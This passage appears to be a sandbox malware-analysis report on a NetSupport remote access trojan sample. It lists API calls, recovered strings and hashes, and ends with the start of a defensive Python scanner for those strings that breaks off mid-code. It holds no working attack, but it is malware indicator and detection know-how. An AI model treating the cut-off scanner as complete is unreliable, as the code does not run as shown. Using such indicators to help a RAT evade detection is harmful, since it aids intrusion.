                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ItemKillTextTimerwsprintf
                                                                                                    • String ID: AckDlgTimeoutAccept$Client$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1646146092-2249245707
                                                                                                    • Opcode ID: 7dc96b62a111e24c38fe96bdc37feb4b5347b5e25539e70e2d70022caea4a714
                                                                                                    • Instruction ID: 6e70745eb55afa015ec8191140cbf7c94f3762290eef46a85586a2895409f75f
                                                                                                    • Opcode Fuzzy Hash: 7dc96b62a111e24c38fe96bdc37feb4b5347b5e25539e70e2d70022caea4a714
                                                                                                    • Instruction Fuzzy Hash: 1811D639B0070AABE710DA69DC90F9A73D9EB88714F108439FA5597780EB71F841C761
                                                                                                    APIs
                                                                                                    • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11061476
                                                                                                    • _memmove.LIBCMT ref: 110614C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProfileString_memmove
                                                                                                    • String ID: Device$No default printer,,LPT1:$Windows
                                                                                                    • API String ID: 1665476579-2460060945
                                                                                                    • Opcode ID: a80445cb8b0764cde8a56589affba30e2d6506b41358464581211ad7e7bc747c
                                                                                                    • Instruction ID: 997ed7acf0a8bd8c6630bc0b785afad6bbb3e6f6dd83aa9723dbfee9264657b9
                                                                                                    • Opcode Fuzzy Hash: a80445cb8b0764cde8a56589affba30e2d6506b41358464581211ad7e7bc747c
                                                                                                    • Instruction Fuzzy Hash: 82117835D0021AA6DB11CFA4DC85BFEBBACDF41308F140058EC865B244EE75660EC3B2
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 111556F8
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11155739
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 1115575D
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1115578A
                                                                                                    Strings
                                                                                                    • CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32, xrefs: 111556EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                    • String ID: CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
                                                                                                    • API String ID: 1800380464-4062393554
                                                                                                    • Opcode ID: 84f327e6b75b548a7d9fe86136213cac0435364b0201bcb2ede9cd2a5e58427b
                                                                                                    • Instruction ID: 236d90f0b759a8580a44e9067a38d2d41aaaf05ec79b0a01a67f4502ef5b25ad
                                                                                                    • Opcode Fuzzy Hash: 84f327e6b75b548a7d9fe86136213cac0435364b0201bcb2ede9cd2a5e58427b
                                                                                                    • Instruction Fuzzy Hash: AE21847190012DEBCBA58F64DC85FDFFBB8EF06704F4041A9E919E2140DAB05A94CFA1
                                                                                                    APIs
                                                                                                    • GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 1113909E
                                                                                                    • _memmove.LIBCMT ref: 111390ED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProfileString_memmove
                                                                                                    • String ID: ,,LPT1:$Device$Windows
                                                                                                    • API String ID: 1665476579-2967085602
                                                                                                    • Opcode ID: b0f5d679832389c680bed705195b68b271f2f9142042f2244acce39101443119
                                                                                                    • Instruction ID: 0db63d288a834b8e7c0b1b42fb5f101f760077cdfb46684da179e565062d31f1
                                                                                                    • Opcode Fuzzy Hash: b0f5d679832389c680bed705195b68b271f2f9142042f2244acce39101443119
                                                                                                    • Instruction Fuzzy Hash: B9113B7590024BAADF119F24AD45BFAF769EF85308F044068ED85A7245FA32670DC3B2
                                                                                                    APIs
                                                                                                    • __strdup.LIBCMT ref: 110C97E7
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastMessageProcess__strdupwsprintf
                                                                                                    • String ID: *this==src$..\CTL32\NSMString.cpp$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                                                                    • API String ID: 3256405202-349135390
                                                                                                    • Opcode ID: 27c6eb7fd27d8d27b3a2ff34c75bb2e954ebe92b2c02cfbf43a67c72e0dd4b1d
                                                                                                    • Instruction ID: 2d4f70c5b9453de1285b66ba1ee7d3834edb01627b603a32f0ca469627614c4a
                                                                                                    • Opcode Fuzzy Hash: 27c6eb7fd27d8d27b3a2ff34c75bb2e954ebe92b2c02cfbf43a67c72e0dd4b1d
                                                                                                    • Instruction Fuzzy Hash: 28112579F00A07ABCB00DF29EC10F5EF7E9AF91A08B04C0A5E55897701F631B4058BC1
                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1112975E
                                                                                                    Strings
                                                                                                    • DisableRunplugin, xrefs: 11129798
                                                                                                    • Shell_TrayWnd, xrefs: 11129759
                                                                                                    • Client, xrefs: 1112979D
                                                                                                    • Check9xLogon - [bLoggedIn: %u] send command %d to connections, xrefs: 111297D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FindWindow
                                                                                                    • String ID: Check9xLogon - [bLoggedIn: %u] send command %d to connections$Client$DisableRunplugin$Shell_TrayWnd
                                                                                                    • API String ID: 134000473-1587978603
                                                                                                    • Opcode ID: 38db118c5ed8e172d8d8045f3fd6efdb7c81d6174fa76497af954baf75e9ee07
                                                                                                    • Instruction ID: ffc561542de68da1f4aaa78ab69c10937e35579fb0a96ec00c588360ed09fd1b
                                                                                                    • Opcode Fuzzy Hash: 38db118c5ed8e172d8d8045f3fd6efdb7c81d6174fa76497af954baf75e9ee07
                                                                                                    • Instruction Fuzzy Hash: D4112974742639ABE7058EE9CE84BBEF765EB4038CF650038E8109A180FBB0A440CB91
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(?,1102BE6D,00000000,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102B94C
                                                                                                    • InterlockedIncrement.KERNEL32(111E0FB4), ref: 1102B989
                                                                                                    • InterlockedDecrement.KERNEL32(111E0FB4), ref: 1102B9B0
                                                                                                    Strings
                                                                                                    • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102B996, 1102B9BC
                                                                                                    • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102B96F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Interlocked$DecrementIncrementVersion
                                                                                                    • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
                                                                                                    • API String ID: 1284810544-229394064
                                                                                                    • Opcode ID: cf29cf42e3b0eefbb8a643aabc0329f1d796e9c1334b561f15cc73702d8281a1
                                                                                                    • Instruction ID: 1eb963e0b6f14a46663ff2586e1c1ec39cc15301dd842ec930316428a2671cff
                                                                                                    • Opcode Fuzzy Hash: cf29cf42e3b0eefbb8a643aabc0329f1d796e9c1334b561f15cc73702d8281a1
                                                                                                    • Instruction Fuzzy Hash: C801493AF40E361BD6139BD66D08B99F799DF4432DF814062FE1992104E631A8008BF2
                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(00000000,NSMCobrMain,?), ref: 110BB365
                                                                                                    • LoadIconA.USER32(00000000,000032FA), ref: 110BB389
                                                                                                    • LoadCursorA.USER32(00000000,000019C8), ref: 110BB39D
                                                                                                    • RegisterClassA.USER32(?), ref: 110BB3D0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ClassLoad$CursorIconInfoRegister
                                                                                                    • String ID: NSMCobrMain
                                                                                                    • API String ID: 2883182437-2967143332
                                                                                                    • Opcode ID: ca51ce0da92f8865cf7b4a37de5a80f6b78405ba89655c2f8fd08a1d4c1e9234
                                                                                                    • Instruction ID: c91d1a4a3b93a440d5b578dd6a7d1bb8d6f3f4c651027d5d72633acd3798b9df
                                                                                                    • Opcode Fuzzy Hash: ca51ce0da92f8865cf7b4a37de5a80f6b78405ba89655c2f8fd08a1d4c1e9234
                                                                                                    • Instruction Fuzzy Hash: 9F015AB4D1122CABCF00DFE59849AEEFBB8AB48754F40416AE818B7240E77596409BE5
                                                                                                    APIs
                                                                                                    • BringWindowToTop.USER32(00000000), ref: 1115315C
                                                                                                    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,00000000,1102BF72,TermUI...), ref: 11153175
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Bring
                                                                                                    • String ID: MMPlayer$MMPlayerOnTop
                                                                                                    • API String ID: 3868984299-4271085576
                                                                                                    • Opcode ID: af7856b2b848aac60008f449ae5680050ef8d2bde6db30b0cae771afdcea954e
                                                                                                    • Instruction ID: a7937f5bea9856c3ffd92c25fff6ad54493ea88870c2ae74a5311f1dc99a0817
                                                                                                    • Opcode Fuzzy Hash: af7856b2b848aac60008f449ae5680050ef8d2bde6db30b0cae771afdcea954e
                                                                                                    • Instruction Fuzzy Hash: 0F014F34394300BBE7718BB4CD96F96B2A0AB48B11F200A18F776AB2C0C6F4B000CB18
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B690: _memset.LIBCMT ref: 1113B6D5
                                                                                                      • Part of subcall function 1113B690: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1113B6EE
                                                                                                      • Part of subcall function 1113B690: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1113B715
                                                                                                      • Part of subcall function 1113B690: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1113B727
                                                                                                      • Part of subcall function 1113B690: FreeLibrary.KERNEL32(00000000), ref: 1113B73F
                                                                                                      • Part of subcall function 1113B690: GetSystemDefaultLangID.KERNEL32 ref: 1113B74A
                                                                                                    • GetSysColor.USER32(0000000F), ref: 1113B829
                                                                                                    • LoadBitmapA.USER32(00000000,00000000), ref: 1113B83F
                                                                                                    • SendDlgItemMessageA.USER32(00000000,00003A97,00000172,00000000,00000000), ref: 1113B87B
                                                                                                    Strings
                                                                                                    • hGrip || !"Unable to load sizing grip bitmap", xrefs: 1113B85E
                                                                                                    • ..\ctl32\util.cpp, xrefs: 1113B859
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$AddressBitmapColorDefaultFreeItemLangMessageProcSendSystemVersion_memset
                                                                                                    • String ID: ..\ctl32\util.cpp$hGrip || !"Unable to load sizing grip bitmap"
                                                                                                    • API String ID: 1044520585-3315463184
                                                                                                    • Opcode ID: c4d1d12b1b57996beddbbd3ea187c1ef115eee2bbae2384f7023241703387bcc
                                                                                                    • Instruction ID: d3ec676b8e14f3829fbdc54e3ae0169b2bbd10960b91061ef2a2ed8224b076af
                                                                                                    • Opcode Fuzzy Hash: c4d1d12b1b57996beddbbd3ea187c1ef115eee2bbae2384f7023241703387bcc
                                                                                                    • Instruction Fuzzy Hash: 45F0BB79B5022537D25156E1AC05FEBBB5C5B40B7AF004070FE18A71C5DD74A94093E5
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B690: _memset.LIBCMT ref: 1113B6D5
                                                                                                      • Part of subcall function 1113B690: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1113B6EE
                                                                                                      • Part of subcall function 1113B690: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1113B715
                                                                                                      • Part of subcall function 1113B690: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1113B727
                                                                                                      • Part of subcall function 1113B690: FreeLibrary.KERNEL32(00000000), ref: 1113B73F
                                                                                                      • Part of subcall function 1113B690: GetSystemDefaultLangID.KERNEL32 ref: 1113B74A
                                                                                                    • LoadLibraryA.KERNEL32(gdi32.dll,?,75BFCF90,?,11003C82,00000000,00000008), ref: 1113B7D5
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 1113B7E7
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,11003C82,00000000,00000008), ref: 1113B7FE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc$DefaultLangSystemVersion_memset
                                                                                                    • String ID: SetLayout$gdi32.dll
                                                                                                    • API String ID: 796689547-836973393
                                                                                                    • Opcode ID: dd7f61846106ed16b6de00baadf4d64720b3b430165eb6431653a99895e619f8
                                                                                                    • Instruction ID: fcbc23df4802d43fd542e0cc31971a5367ee65483ed6e28c66af2e23f0707a34
                                                                                                    • Opcode Fuzzy Hash: dd7f61846106ed16b6de00baadf4d64720b3b430165eb6431653a99895e619f8
                                                                                                    • Instruction Fuzzy Hash: A9E0ED3A3001256B93025A2BEC849AEBB5CEEC42B63048031FD28C2248EA30C80586B5
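The string tables in the entries above (the e:\nsmsrc\nsm\ source path and ..\CTL32\NSMString.cpp, the NSMCobrMain window class, the Check9xLogon and EnableAudioHook trace formats, DisableRunplugin, MMPlayerOnTop, ..\ctl32\util.cpp) are build artifacts of the NetSupport Manager client that this report classifies as NetSupport RAT, and they were recovered from the module dumped out of process 6 at 0x11000000, not from Merge.exe on disk. The scanner below is an added example, not part of the Joe Sandbox report and not NetSupport or Joe Sandbox code: it searches a memory dump for exactly those strings, deliberately leaves out the generic ones that any Windows program can contain (Shell_TrayWnd, Client, kernel32.dll, SetLayout, GetUserDefaultUILanguage), and only calls the buffer NetSupport client code when a build-path leak is corroborated by a second kind of artifact. The category labels, the verdict rule, the UTF-16LE second pass and the two sample buffers are assumptions constructed for the example.

```python
"""Scan a process memory dump for NetSupport Manager client build artifacts.

Added example for the report above; not Joe Sandbox or NetSupport code.
Indicator strings are copied from the report's Strings / String ID entries.
Categories, the verdict rule, the UTF-16LE pass and the sample buffers
are assumptions made for this example.
"""

# Indicators from the report, tagged by the kind of artifact they are
# (assumed categories) so the verdict can demand corroboration.
INDICATORS: dict[bytes, str] = {
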